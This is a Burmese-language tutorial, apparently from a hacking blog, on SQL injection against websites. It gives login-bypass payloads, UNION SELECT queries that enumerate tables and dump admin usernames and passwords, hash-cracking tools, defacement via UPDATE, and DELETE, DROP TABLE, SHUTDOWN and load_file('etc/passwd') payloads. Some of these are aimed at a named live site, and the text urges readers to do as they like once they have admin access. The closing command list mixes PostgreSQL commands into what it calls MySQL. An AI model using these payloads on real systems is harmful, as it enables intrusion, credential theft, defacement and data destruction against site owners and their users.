နဲ႔ sql အေၾကာင္းသိထားရင္ နားလည္ေလာက္ပါတယ္။
---DATABASE ဆိုတာဘာလဲ?---
ရုိးရုိးရွင္းရွင္းပါပဲ... Database ဆုိတာဘာလဲဆုိရင္ Database ဆုိတာ အခ်က္အလက္ Data ေတြစုစည္းသိမ္းဆည္းထားတဲ႔ Application တစ္ခုပါပဲ... Application Programming Interface (API) ေတြကုိ တည္ေဆာက္ အသုံးၿပဳမယ္ ထိန္းသိမ္း သိမ္းဆည္းထားမယ္။ Database(DB) servers ေတြဟာ Web development လုပ္ငန္းေတြ နဲ႔လည္း ေပါင္းစည္းအသုံးၿပဳလုိ႔ရတဲ႔အတြက္ ၄င္းအထဲက data ေတြကုိ ထုတ္ယူအသုံးၿပဳ၊ ၾကည့္ရႈ႕ဖုိ႔ဆုိတာ ခက္ခဲ႔တဲ႔ကိစၥတစ္ခုေတာ့မဟုတ္ပါဘူး။ Database အထဲမွာ usernames, passwords စသည္ ေတြလုိ အေရးၾကီးတဲ႔ အခ်က္အလက္ေတြကုိလည္း သိမ္းဆည္းႏုိင္တာ ၿဖစ္တဲ႔အတြက္ Database ရဲ႕ လုံၿခံဳေရးဟာလည္း အလြန္ကုိအေရးၾကီးပါတယ္။ ထိန္းသိမ္းမႈ ညံ့ဖ်င္းတဲ႔ database တစ္နည္းအားၿဖင့္ အမွတ္တမဲ႔ၿဖစ္ေစ၊ သတိမမႈ၍ေသာ္လည္းေကာင္း၊ အေၾကာင္းေၾကာင္းအမ်ဳိးမ်ဳိးေၾကာင့္ programmer ေတြေရးသားထားတဲ႔ code ေတြရဲ႕ လြဲမွားမႈေတြ ေၾကာင့္ ဒီလုိဟာကြက္ေတြ ၿဖစ္ေပၚကာ database ထဲကုိ အၿခား တရားမ၀င္ ၀င္ေရာက္သူတုိ႔အား လမ္းဖြင့္ေပးသလုိၿဖစ္သြားတတ္ပါတယ္။ DB servers ေတြအမ်ားၾကီးရွိတဲ႔အထဲမွာ ဒါေလးေတြက အသုံးမ်ားတာေလးေတြပါ။
MySQL(Open source),
MSSQL,
MS-ACCESS,
Oracle,
Postgre SQL(open source),
SQLite စသည္ေပါ႔...
Database ရဲ႕ တည္ေဆာက္ပုံေလးကုိ ၿမင္ႏုိင္ေအာင္လုိ႔ ဇယားေလးနဲ႔ၿပထားတာပါ။
--- SQL INJECTION ဆုိသည္မွာ?---
SQL injection ဆုိတာကေတာ့ ယေန႔ေခတ္ အင္တာနက္စာမ်က္ႏွာေပၚမွာ အၿဖစ္အမ်ားဆုံး web application အမွားၿဖစ္ပါတယ္။ ၄င္း web application အမွားတစ္ခုမွေန၍ တရားမ၀င္ ၀င္ေရာက္အသုံးၿပဳသူေတြ (Hackers) က မိမိတုိ႔ရဲ႕ အေရးၾကီးတဲ႔ အခ်က္အလက္ေတြကုိ ခုိးယူသြားႏုိင္ပါတယ္။ ဒါေၾကာင့္ SQL injection ဆုိတာ web or db server တုိ႔ရဲ႕ အမွားေၾကာင့္မဟုတ္ပဲ အေတြ႔အၾကံဳမ့ဲ၊ အေရအခ်င္း ည့ံဖ်င္းတဲ႔ programming ေရးဆြဲသူေတြေၾကာင့္သာၿဖစ္ပါတယ္။ ဒီနည္းလမ္းက အေ၀းတစ္ေနရာကေန application, web server ကုိ အလြယ္ ကူဆုံးထိန္းခ်ဳပ္ႏုိင္ပါတယ္။ ဒီ SQL injection မွာ ပုံစံအမ်ဳိးမ်ဳိးေသာ SQL commands ေတြ နဲ႔ web page ကေန အမ်ဳိးမ်ဳိးေသာ data ေတြကို ထုတ္ယူႏုိင္ပါတယ္။
ဥပမာတစ္ခုအေနနဲ႔ေၿပာမယ္ဆုိရင္ ကၽြန္ေတာ္တုိ႔က Company တစ္ခုရဲ႕ Network တစ္ခုကုိ၀င္ေရာက္ေတာ့မယ္ဆုိရင္ port scanner ေတြနဲ႔ sanner ဖတ္ၿပီး အမွားေတြနဲ႕ ပြင့္ဟေနတဲ႔ port ကေန ၀င္ေရာက္သြားႏုိင္ပါတယ္။ ဒါေပမဲ႔လည္း အင္တာနက္နဲ႔ ခ်ိတ္ဆက္ထားတဲ႔ Web Server (Host Sever) တစ္ခုက port 80 ေလာက္ပဲဖြင့္မယ္၊ တစ္ၿခား security ပုိင္းေတြ ေပးထားမယ္ဆုိရင္ port scanner ဘယ္ေလာက္ေကာင္းေကာင္း အလုပ္ၿဖစ္မွာမဟုတ္ပါဘူး၊ ၀င္ေရာက္ဖုိ႔ခက္သြားပါလိမ့္မယ္( ခက္ခဲေနမယ္ )... ဒါဆုိရင္ Web Hacking ကုိ ဦးတည္ၿပီးေၿပာင္းၾကည့္ရပါလိမ့္မယ္... Web Hacking လုိ႔ေၿပာရင္ ေတာ္ေတာ္မ်ားမ်ားကေတာ့ SQL Injection ကုိပထမဦးစြာေၿပးၿမင္ၾကမွာပါပဲ... ဟုတ္တယ္ေလ.. SQL Injection ကတစ္ၿခားဘာမွမလုိဘူး Web Browser တစ္ခုပဲလုိတယ္...
---ေရွာင္ကြင္း ၀င္ေရာက္ၿခင္း---
Site ေတြမွာ username, password ေတြနဲ႔ login ၀င္ခုိင္းတယ္ဆုိတာ site အထဲမွာ ရွိတဲ႔ content ေတြကုိ မွတ္ပုံတင္ထားတဲ႔သူ (username & password ရွိထားတဲ႔သူ) ေတြကုိသာ ၾကည့္ရႈအသုံးၿပဳခြင့္ေပးထားတာပါ။ အကယ္၍ မိတ္ေဆြက username & password မရွိပဲ ရွိသကဲ႔သုိ႔ ၀င္ေရာက္အသုံးၿပဳမယ္ (user registration မလုပ္ပဲ ၀င္ေရာက္တယ္) ဆုိရင္ ဒါကုိ BYPASSING LOGINS လုပ္တယ္လုိ႔ေခၚပါတယ္။ ဒါကေတာ့ programmer ရဲ႕ login မွာစီစစ္မႈ မေသခ်ာလုိ႔ ၿဖစ္တဲ႔အတြက္ ကံေကာင္းေထာက္မစြာနဲ႔ User name နဲ႔ Password ကုိမသိပဲ login ၀င္လုိ႔ရသြားပါလိမ့္မယ္။
ဥပမာတစ္ခုအေနနဲ႔ ၾကည့္မယ္ဆုိရင္ username က admin ၿဖစ္ၿပီး password က 12345 ဆုိၾကပါစုိ႔... ဒါဆိုရင္ SQL query က
SELECT USER from database WHERE username='admin' AND password='12345' ဆုိၿပီးၿဖစ္သြားပါလိမ့္မယ္..... အကယ္၍ အေပၚ SELECT command တန္ဖုိးက မွန္တယ္ဆုိရင္ site ထဲကုိ ၀င္ခြင့္ၿပဳမွာၿဖစ္ပါတယ္။ အကယ္၍ အထက္ပါေၿပာခဲ႔သလုိ programmer က login မွာမွန္ကန္တဲ႔စီစစ္မႈမရွိရင္ Hacker ေတြက ေအာက္ပါအတုိင္း ၀င္ေရာက္သြားႏုိင္ပါတယ္။
username:a or 1=1--
password:blank
SQL query မွာေတာ့
SELECT USER from database WHERE username='a' or 1=1-- AND password=''
ဒါက comment operator ပါ အဲ႔လုိပဲ အၿခား comment operator က /* ၿဖစ္ပါတယ္။
SELECT USER from database WHERE username='a' or 1=1
1=1 က အၿမဲတန္း query ကုိ true ၿဖစ္ေစၿပီး OR ကေတာ့ query တစ္ခုက true ၿဖစ္တဲ႔အတြက္ အၿခားတစ္ခုကုိလည္း true ၿဖစ္သြားေစပါတယ္ဒါေၾကာင့္ 'a' ဆုိတဲ႔ user ဟာ DB မွာမရွိေတာင္မွ ဒီ query က true ၿဖစ္ကာ site admin ကို၀င္ေရာက္ခြင့္ေပးသြားပါလိမ့္မယ္... ဒီလုိနည္းနဲ႔ Vulnerable ၿဖစ္တဲ႔ site ေတြအတြက္ ေအာက္ပါအတုိင္း စမ္းစစ္ႏုိင္ပါေသးတယ္...
username:' or 1='1 password:' or 1='1
username:' or '1'='1' password:' or '1'='1'
username:or 1=1 password:or 1=1
--- လ်ဳိ႕၀ွက္ထားေသာ Data မ်ားကုိ ၀င္ေရာက္အသုံးၿပဳၿခင္း---
SQL injection က အခုလုိ bypassing logins တစ္ခုတည္းမဟုတ္ပဲ DB servers ကေန လ်ဳိ႕၀ွက္စြာသိမ္းဆည္းထားတဲ႔ Data ေတြကုိ ရယူႏုိင္ပါတယ္... အနည္းငယ္ရႈပ္ေထြးေနမွာၿဖစ္တဲ႔အတြက္ နဲနဲေလး အထူးဂရုၿပဳၿပီးေတာ့ ေလ့လာၾကည့္ပါ။ ေအာက္ပုိင္းမွာ လက္ေတြ႔စမ္းလုိ႔ရေအာ္ site link နဲ႔ တကြ ေဖာ္ၿပေပးထားပါတယ္။
---အားနည္းခ်က္ အမွားမ်ား ရွာေဖြစစ္ေဆးၿခင္း---
Site တစ္ခုကုိရွာလုိက္မယ္...
In PHP ==>>
www.site.com/article.php?id=5
id variable assign လုပ္ထားတဲ႔ ေနာက္နားက ' (apostrophe) ေလးတစ္ခုကုိ ထည့္လုိက္ပါမယ္..
www.site.com/article.php?id=5'
ဒီလုိလုိ စမ္းတဲ႔ေနရာမွာ
Integer Based
www.site.com/script.php?param=36'
www.site.com/script.php?param='36'
www.site.com/script.php?param=(12+24)
www.site.com/script.php?param=%
www.site.com/script.php?param=36'a
String Based
www.site.com/script.php?param=Text'--
www.site.com/script.php?param=Te'+'xt
www.site.com/script.php?param=Tex%
ဆုိၿပီးရွိပါတယ္.. အဆင္ေၿပသလုိ စမ္းသပ္ႏုိင္ပါတယ္...
အကယ္၍ ၄င္းရဲ႕ site က vulnerable မၿဖစ္ဘူးဆုိရင္ ပုံမွန္အတုိင္း page loading လုပ္သြားပါလိမ့္မယ္..
အဲ႔လုိမဟုတ္ပဲ query string filtering မရွိဘူးဆုိရင္ "MySQL Syntax Error By '5'' In Article.php on line 15." သုိမဟုတ္ Check the correct MySQL version သုိ႔မဟုတ္ MySQL Fetch error သုိ႔မဟုတ္ပါက ဘာမွမေပၚပဲ page အၿဖဴၾကီးသာေပၚေနပါလိမ့္မယ္... ဒါဆုိရင္ ဒီ site က vulnerable ၿဖစ္ေနပါတယ္ အကယ္၍ ' ၿဖင့္ မရလွ်င္ ေအာက္ပါအတုိင္း union select 1-- ဆုိတာကုိသုံးႏုိင္ပါတယ္။
www.site.com/article.php?id=5 union select 1--
In ASP ==>>
အထက္ပါနည္းအတုိင္း
http://www.site.com/index.asp?id=5
ဆုိရင္ ေနာက္က ' (apostrophe) ေလးထည့္ၿပီးစမ္းႏုိင္ပါတယ္။
http://www.site.com/index.asp?id=5'
ဒါဆုိရင္
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
ဆုိတဲ႔ error မ်ဳိးေပၚေနတတ္ၿပီး ASP, JSP, CGI, နဲ႔ PHP web pages ေတြမွာ စမ္းသပ္ႏုိင္ပါတယ္။
အကယ္၍ URL မွာ မေပၚတဲ႔ parameters မ်ဳိးဆုိရင္ ၄င္းတုိ႔ရဲ႕ login page, search page, feedback လုိေနရာမ်ဳိးေတြက ရွာႏုိင္ပါတယ္.. တစ္ခ်ဳိ႕ html page ေတြက POST command နဲ႔ ASP page ကုိ ပုိ႔ေဆာင္ေပးတဲ႔ parameters သုံးထားတတ္ပါတယ္.. ဒါဆုိရင္ေတာ့ ၄င္းတုိ႔ရဲ႕ HTML source code ထဲကုိ ၀င္ေရာက္ပါ။ ၿပီးရင္ "FORM" tag ကုိရွာလုိက္ပါ ... ဥပမာ
span class="tags">FORM action=Search/search.asp method=post>
span class="tags">input type=hidden name=A value=C>
span class="tags">/FORM>
ဒီ span class="tags">FORM>span class="tags">/FORM> ႏွစ္ခုၾကားက ၿဖစ္ႏုိင္ေၿခေတြပါ။
span class="tags">FORM action=http://duck/Search/search.asp method=post>
span class="tags">input type=hidden name=A value='a' or 1=1--">
span class="tags">/FORM>
value မွာ အေပၚကအတုိင္း BYPASSING LOGINS မွာသုံးသလုိ စမ္းသပ္ၿပီးရွာေဖြႏုိင္ပါတယ္။
---Columns အေရအတြက္ရွာေဖြၿခင္း---
‘order by’ ကုိအသုံးၿပဳၿပီး Columns မ်ားကုိ ရွာေဖြမွာၿဖစ္ပါတယ္..
URL query ကုိေအာက္ပါတုိင္း ရုိက္ထည့္လုိက္ပါမယ္... '/*' သုိ႔မဟုတ္ '--" ဆုိတာေလးသုံးလုိ႔ရပါတယ္..
www.site.com/article.php?id=5 order by 1/*
အမွားမေပၚဘူးဆုိရင္ ေနာက္တစ္ခါ 2 ဆုိၿပီးတုိးကာ ရုိက္ထည့္ပါမယ္
www.site.com/article.php?id=5 order by 2/*
ယခုအခ်ိန္အထိ အမွားမေပၚေသးဘူးဆုိရင္ ေနာက္တစ္ ထပ္ၿပီးတုိးပါမယ္.. ဒီလုိတုိးတုိးၿပီး အမွားေပၚလာတဲ႔အထိ ရွာေဖြရမွာၿဖစ္ပါတယ္...
www.site.com/article.php?id=5 order by 3/*
အခု 3 ကုိေရာက္တဲ႔အခါ အမွားေတြ႔တယ္ဆုိရင္
ဒါဆုိရင္ ကၽြန္ေတာ္တုိ႔ Columns ႏွစ္ခုရွိတယ္ဆုိတာ သိသြားပါၿပီ... ဒီလုိနည္းနဲ႔ Column ေတြကုိ တစ္ဆင့္ၿခင္းရွာေဖြရပါတယ္...
ေနာက္တစ္ခု ပုံနဲ႔ တကြ ရွာေဖြၾကည့္ရေအာင္
http://sbisa.org/circle.php?id=26 ကုိၾကည့္မယ္..
http://sbisa.org/circle.php?id=26 ရဲ႕ value ေနာက္မွာ ' ဆုိတဲ႔ (apostrophe) တစ္ခုထည့္လုိက္ပါမယ္..
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sbisaor/public_html/circle.php on line 10 ဆုိတဲ႔ error တစ္ခုေတြ႔ပါလိမ့္မယ္..
ဒါဆုိရင္ေသခ်ာတယ္.. SQL error တစ္ခုတက္ေနၿပီ... တိတိက်က်ေၿပာရရင္ DB Server က MySQL
OK, ဒါဆုိရင္ ကၽြန္ေတာ္တုိ႔ Columns အေရအတြက္ရွာမယ္...
http://sbisa.org/circle.php?id=-26 order by 1,2,3,4,5,6-- ဒီအထိအဆင့္အဆင့္ရွာတယ္... error မၿဖစ္ေသးဘူး
7 အထိေရာက္တဲ႔အခါမွာေတာ့ error ေတြ႔တယ္ဆုိရင္ ဒါဟာ 6 Columns ရွိတယ္..
ဒါဆုိရင္ေနာက္ထပ္ UNION SELECT ALL ဆုိတဲ႔ statement တစ္ခုကုိသုံးမယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,4,5,6-- ဆုိၿပီးရုိက္ထည့္လုိက္မယ္..
ဒါဆုိရင္ 2,3,4 ဆုိတာၿပမယ္.. ဒီအပုိင္းေတြက data ေတြသိမ္းဆည္းထားတဲ႔ Columns ေတြၿဖစ္တယ္...
---MySQL version ရွာၿခင္း---
ဒီ Injection မွာ MySQL Version ကုိ checking လုပ္ဖုိ႔လုိပါတယ္... . Version အား Checking လုပ္ရန္ @@version သုိ႔မဟုတ္ version() functions ေတြကုိသုံးေပးရပါမယ္..
အခု @@version ကုိ data ေတြသိမ္းဆည္းထားတဲ႔ column မွာထည့္ၿပီး MySQL version ကုိစစ္မယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,@@version,3,4,5,6--
သုိ႔မဟုတ္
http://sbisa.org/circle.php?id=-26 union select all 1,version(),3,4,5,6--
ကုိသုံးႏုိင္ပါတယ္.. တခါတစ္ေလမွာ အထက္ပါနည္းအတုိင္းက error ေတြၿဖစ္တတ္တဲ႔အတြက္ unhex(hex()) ကုိသုံးေပးရပါမယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex(@@version)),3,4,5,6--
ဒါဆုိရင္ Server မွာ အသုံးၿပဳေနတဲ႔ MySQL ရဲ႕ version ကုိေဖာ္ၿပေပးသြားပါလိမ့္မယ္...
အကယ္၍ user တုိ႔ ၊ database တုိ႔ကုိ check ခ်င္တယ္ဆုိရင္ ေအာက္ပါတုိင္း checking လုပ္ႏုိင္ပါတယ္..
www.site.com/article.php?id=5 UNION ALL SELECT user(),2/*
www.site.com/article.php?id=5 UNION ALL SELECT database(),2/*
ဥပမာ :- http://sbisa.org/circle.php?id=-26 union select all 1,version(),database(),user(),5,6--
--MySQL 5 ႏွင့္အထက္ injection---
အခုကၽြန္ေတာ္တုိ႔ ရတာ MySQL version 5.0.90 ၿဖစ္ပါတယ္... MySQL version 5 မွာ information_schema ဆုိတဲ႔ အသုံး၀င္တဲ႔ funtion တစ္ခုပါ၀င္ၿပီး ၄င္းက လက္ရွိ DB server ရဲ႕ tables နဲ႔ columns ေတြကုိ ထိန္းသိမ္းထားတာၿဖစ္ပါတယ္...
Tables ေတြကုိရယူရန္ table_name from information_schema.tables ဆုိတာကုိသုံးသလုိ
Columns ေတြကုိရယူရန္ column_name from information_schema.columns ဆုိတာကုိသုံးရပါမယ္..
ေနာက္တစ္ခုကေတာ့ ဒီ site အေပၚမွာ ၿမင္ရေအာင္လုိ႔ group_concat(table_name) ကုိ Tables ေတြအတြက္နဲ႔
group_concat(column_name) ကုိ Columns ေတြအတြက္သုံးေပးရပါတယ္...
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
ေစာေစာက ကၽြန္ေတာ္တုိ႔ MySQL version ကုိ @@version အစား unhex(hex()) နဲ႔သုံးခဲ႔ရတယ္ဆုိရင္ အခု Table နဲ႔ Column ကုိရွာတဲ႔အခါမွာလည္း အဲ႔လုိပဲ သုံးေပးရပါတယ္။
http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex()),3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
ေနာက္ထက္တစ္ခါ ကၽြန္ေတာ္တုိ႔ Columns ေတြကုိၾကည့္မယ္ဆုိရင္
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_schema=database()--
ဒါဆုိရင္ DB ထဲက table ေတြကုိ ေဖာ္ၿပေပးပါၿပီ... အခု ကၽြန္ေတာ္တု႔ိဒီ tables ေလးေတြကုိ စနစ္တက် မွတ္သားထားပါမယ္... ေနာက္တစ္ဆင့္တက္ကာ ကၽြန္ေတာ္တုိ႔လုိခ်င္တဲ႔ user name နဲ႔ password ေတြ သိမ္းထားတဲ႔ table ကုိၾကည့္ပါမယ္...
group_concat ကုိပဲ ဆက္လက္သုံးပါမယ္.. ဒါေပမဲ႔ ကၽြန္ေတာ္တုိ႔ လုိခ်င္တဲ႔ username, password ေတြသိမ္းထားေလာက္တဲ႔ columns ေတြထဲက စစ္ထုတ္ယူမွာပါ။ ဒီေနရာမွာ ကၽြန္ေတာ္တုိ႔ မွန္းထားတဲ႔ table အမည္ကုိ from information_schema.tables where table_schema=database-- ေနရာမွာ ထည့္သြင္းမွာၿဖစ္ပါတယ္..
0x3a ဆုိတာကေတာ့ ":" ရဲ႕ hex code ပါ။
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(username,0x3a,password),5,6 from admin--
ဒါဆုိရင္ေတာ့ မိမိတုိ႔လုိခ်င္တဲ႔ username နဲ႔ password ကုိရသြားပါၿပီ... ရရွိထားတဲ႔ password ဟာ plaintext ၿဖစ္တယ္ဆုိရင္ေတာ့ ထပ္ၿပီးေခါင္းရႈပ္စရာမလုိေတာ့ဘူးေပါ႔
တစ္ခ်ဳိ႕ကေတာ့ password hashed လုပ္ထားတဲ႔ အတြက္ ၄င္းတုိ႔အား hash cracker ေတြနဲ႔ ေၿဖထုတ္ေပးရပါလိမ့္မယ္..
ဥပမာ admin:3a39ec8cd0c399cc247936ad5e0b6927
John The Ripper
www.openwalls.org
Cain & Able
www.oxid.it
hash လုပ္ထားတဲ႔ password ေတြသာဆုိရင္ေတာ့ အနည္းငယ္ခက္သြားပါလိမ့္မယ္... အထက္ပါ hash ကုိ crack လုပ္လုိက္ရင္ admin:PlanetCreator ဆုိၿပီးရပါမယ္..
ကဲ ဒါဆုိရင္ေတာ့ admin နဲ႔ password ကုိရၿပီဆုိရင္ ကုိယ္လုပ္ခ်င္သလုိလုပ္ေပေတာ့..
---MySQL version 4 injection---
MySQL version က 4 ၿဖစ္မယ္ဆုိရင္ version 5 လုိ information_schema.tables and information_schema.columns ကုိ support မလုပ္တဲ႔အတြက္ table name နဲ႔ column name ေတြကုိ guess လုပ္ရပါတယ္... ေနာက္တစ္ခုက error message အေပၚမွာအေၿခခံၿပီးခန္႔မွန္းရတာပါ။ The error reports pnc_article in the error ဆုိရင္ pnc ဆုိတဲ႔ prefix ကုိသုံးထားတဲ႔အတြက္ table name က pnc ဆုိတာ ခန္႔မွန္းလုိ႔ရႏုိင္ပါတယ္။
ဥပမာ ကၽြန္ေတာ္က table name ကုိ user ဆုိၿပီး ခန္႔မွန္းလုိက္မယ္.. ဒါဆုိရင္ ေအာက္ပါအတုိင္းရုိက္ထည့္ေပးၾကည့္မယ္ဆုိပါစုိ႔
www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM user/*
အထက္ပါအတုိင္းရုိက္ထည့္လုိက္လုိ႔ error ၿဖစ္ေနတယ္ဆုိရင္ ဒါဟာ table မရွိလုိပဲ... ေနာက္တစ္ခါထပ္ၿပီး guess လုိက္ပါ... table name ကုိ tbluser ဆုိၿပီးထားလုိက္ပါမယ္..
www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM tbluser/*
ဒီလုိနည္းနဲ႔ table name ေတြ column ေတြအား ခန္႔မွန္းၿပီးထည့္သြားရပါလိမ့္မယ္...
www.site.com/article.php?id=5 UNION ALL SELECT user_name,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT username,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT pass,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT password,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/*
ေနာက္ဆုံး username နဲ႔ password ကုိ ရတဲ႔အထိေပါ႔...
Table name အခ်ိဳ႕ပါ : user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc.
ဒါဟာ Injection ရဲ႕ လ်ဳိ႕၀ွက္ထားတဲ႔ Data မ်ားကုိ ရယူတဲ႔အပိုင္းၿဖစ္ပါတယ္... Admin ရဲ႕ username & password ရၿပီဆုိရင္ Admin Login Page မွာရုိက္ထည့္ရပါမယ္... Joomla ဆုိရင္ /administrator နဲ႔ Wordpress ဆုိရင္ /wp-admin ၿဖစ္ပါတယ္.. အခ်ဳိ႕ site ေတြက admin panel ကုိရွာရခက္ ေနပါလိမ့္မယ္.. ဒါဆုိရင္ admin panel finder ေလးေတြကုိသုံးၿပီးရွာေဖြရပါလိမ့္မယ္...
Admin Panel Finder http://www.planetcreator.net/planetcreator/adminpanelfinder/ နဲ႔ရွာႏုိင္ပါတယ္။
---Site အားၿပင္ဆင္ၿခင္း ---
အခ်ဳိ႕ေသာ Site ေတြက admin ရဲ႕ password ကုိရေပမဲ႔ admin panel ကုိရဖုိ႔ခက္ခဲၿခင္း၊ ရွာမေတြ႔ၿခင္းေတြနဲ႔ ၾကံဳရတတ္ပါတယ္... ဒီလုိေနရာမွာ SQL commands ေတြကုိသုံးၿပီး အထဲက site ရဲ႕ contents ေတြကုိၿပင္ဆင္ေၿပးသြားရမွာၿဖစ္ပါတယ္...
ဒါေလးေတြက အေရးပါတဲ႔ command ေလးေတြပါ
UPDATE: It is used to edit infos already in the db without deleting any rows.
DELETE: It is used to delete the contents of one or more fields.
DROP: It is used completely delete a table & all its associated data.
UPDATE :-
www.site.com/article.php?id=5
ဆုိၾကပါစုိ႔ကၽြန္ေတာ္တုိ႔ရဲ႕ query က ေအာက္ပါအတုိင္းၿဖစ္မယ္ဆုိရင္
SELECT title,data,author FROM article WHERE id=5
(table name နဲ႔ column ေတြက အထက္ပါအတုိင္းရွာေဖြက ထည့္ေပးရတာၿဖစ္ပါတယ္)
ေအာက္ပါအတုိင္း site ကုိၿပင္ေပးသြားပါမယ္...
www.site.com/article.php?id=5 UPDATE article SET title='Hacked By SomeOn3'/*
ခက္ဆန္းဆန္းေလး ထက္ၿပီး အရစ္တက္လုိက္မယ္ဆုိရင္
www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY SomeOn3',data='Welcome to My Planet',author='SomeOn3'/*
သတ္မွတ္ထားတဲ႔ page ေၿပာင္းလဲၿပီး update လုပ္ခ်င္တယ္ဆုိရင္ေတာ့ ေအာက္ပါအတုိင္း ရုိက္ထည့္ေပးရပါတယ္..
www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*
DELETE:- DB Server ထဲကေန အၿမဲတမ္းဖ်က္ပစ္ေတာ့မယ္ဆုိရင္ DELETE command ကုိသုံးသြားပါမယ္..
www.site.com/article.php?id=5 DELETE title,data,author FROM article/*
သတ္မွတ္ထားတဲ႔ page ကုိ delete လုပ္ခ်င္တယ္ဆုိရင္ ေအာက္ပါ table name ရဲ႕ ေနာက္ထဲမွ WHERE နဲ႔ page id ကုိထည့္သြင္းသြားရပါမယ္...
www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*
ဒီတစ္ခုကေတာ့ DROP TABLE ပါ... Table အလုိက္ ဖ်က္ခ်င္တယ္ ဆုိရင္ေတာ့ DROP Table နဲ႔ table name ကုိဆုိၿပီးသုံးပါမယ္...
www.site.com/article.php?id=5 DROP TABLE article/*
ဒီအတုိင္းဖ်က္ရင္ table ေတြေကာ အထဲမွာပါတဲ႔ contents ေတြေကာ အားလုံး ပ်က္သြားပါလိမ့္မယ္...
SHUTTING DOWN MySQL SERVER:
www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT;
LOADFILE:
Server အထဲက .htaccess, .htpasswd ေတြနဲ႔ password files ေတြၿဖစ္တဲ႔ etc/passwd စသည့္ ဖုိင္ေတြကုိ ယူခ်င္တယ္ဆုိရင္ေတာ့ LOADFILE ကုိသုံးရပါတယ္... ဒါကအသုံးေတာ့နည္းပါတယ္....
www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/*
အကယ္၍ hex ေတြနဲ႔ဆုိရင္ေတာ့ ေအာက္ပါတုိင္း သုံးပါမယ္..
www.site.com/article.php?id=5 UNION ALL SELECT load_file(0x272F6574632F70617373776427)
ဒါကုိ Hex based SQL Injection လုိ႔လည္းေခၚႏုိင္ပါတယ္..
* SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
ဒါဟာ server ရဲ႕ c:\boot.ini ကုိ ဆြဲယူေပးပါလိမ့္မယ္..
---MySQL ROOT---
MySQL version 5 နဲ႔အထက္မွာ mysql.user ဆုိတဲ႔ table တစ္ခုဟာ MySQL servers ေတြမွာရွိပါတယ္... အထဲမွာ hash လုပ္ထားတဲ႔ Password နဲ႔ username ေတြပါ၀င္ပါတယ္... ၄င္းအထဲက
hash ဟာ mysqlsha1 ၿဖစ္တဲ႔အတြက္ John The Ripper နဲ႔ crack လုပ္ဖုိ႔ခက္ပါမယ္..
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/*
ဒီအတြက္ InsidePro Password Recovery Software ကုိသုံးလုိ႔ရပါတယ္..
http://www.insidepro.com
---အသုံး၀င္တဲ႔ MySQL commands အခ်ိဳ႕ပါ..---
ABORT — abort the current transaction
ALTER DATABASE — change a database
ALTER GROUP — add users to a group or remove users from a group
ALTER TABLE — change the definition of a table
ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account
ANALYZE — collect statistics about a database
BEGIN — start a transaction block
CHECKPOINT — force a transaction log checkpoint
CLOSE — close a cursor
CLUSTER — cluster a table according to an index
COMMENT — define or change the comment of an object
COMMIT — commit the current transaction
COPY — copy data between files and tables
CREATE AGGREGATE — define a new aggregate function
CREATE CAST — define a user-defined cast
CREATE CONSTRAINT TRIGGER — define a new constraint trigger
CREATE CONVERSION — define a user-defined conversion
CREATE DATABASE — create a new database
CREATE DOMAIN — define a new domain
CREATE FUNCTION — define a new function
CREATE GROUP — define a new user group
CREATE INDEX — define a new index
CREATE LANGUAGE — define a new procedural language
CREATE OPERATOR — define a new operator
CREATE OPERATOR CLASS — define a new operator class for indexes
CREATE RULE — define a new rewrite rule
CREATE SCHEMA — define a new schema
CREATE SEQUENCE — define a new sequence generator
CREATE TABLE — define a new table
CREATE TABLE AS — create a new table from the results of a query
CREATE TRIGGER — define a new trigger
CREATE TYPE — define a new data type
CREATE USER — define a new database user account
CREATE VIEW — define a new view
DEALLOCATE — remove a prepared query
DECLARE — define a cursor
DELETE — delete rows of a table
DROP AGGREGATE — remove a user-defined aggregate function
DROP CAST — remove a user-defined cast
DROP CONVERSION — remove a user-defined conversion
DROP DATABASE — remove a database
DROP DOMAIN — remove a user-defined domain
DROP FUNCTION — remove a user-defined function
DROP GROUP — remove a user group
DROP INDEX — remove an index
DROP LANGUAGE — remove a user-defined procedural language
DROP OPERATOR — remove a user-defined operator
DROP OPERATOR CLASS — remove a user-defined operator class
DROP RULE — remove a rewrite rule
DROP SCHEMA — remove a schema
DROP SEQUENCE — remove a sequence
DROP TABLE — remove a table
DROP TRIGGER — remove a trigger
DROP TYPE — remove a user-defined data type
DROP USER — remove a database user account
DROP VIEW — remove a view
END — commit the current transaction
EXECUTE — execute a prepared query
EXPLAIN — show the execution plan of a statement
FETCH — retrieve rows from a table using a cursor
GRANT — define access privileges
INSERT — create new rows in a table
LISTEN — listen for a notification
LOAD — load or reload a shared library file
LOCK — explicitly lock a table
MOVE — position a cursor on a specified row of a table
NOTIFY — generate a notification
PREPARE — create a prepared query
REINDEX — rebuild corrupted indexes
RESET — restore the value of a run-time parameter to a default value
